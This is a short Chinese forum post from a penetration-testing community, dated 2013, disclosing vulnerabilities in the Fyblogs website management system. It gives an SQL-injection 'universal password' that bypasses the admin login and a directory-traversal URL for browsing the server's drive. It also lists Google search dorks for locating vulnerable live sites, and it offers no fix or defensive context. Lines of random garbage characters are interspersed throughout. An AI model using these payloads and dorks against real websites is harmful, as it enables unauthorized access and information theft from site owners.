中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:17
标题:
Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
+ E9 Y& ~# ] ?& E3 \0 n% Y
* A3 N9 h+ V N" v# P9 d
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
- G5 e9 Y7 h& C4 C$ F% [! w
admin/uploadfile.asp?currentFolder=/upfiles/../
) M6 u7 U' q" G& b. q0 [
( {% S1 |: P- ], n" d Z6 s
漏洞证明:
1 h* Y0 W! b7 u6 E" j
4 J6 P6 R% S8 y6 P& \$ c" z8 f
谷歌:inurl:type.asp?id=1 新闻中心
6 M/ D9 D( m9 A) X# J w
或者 :inurl:download_ok.asp?
2 h+ y7 Y( P2 R# j U- |1 I0 o% O% K
* n# G* o4 w$ {# ^7 X$ B _
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2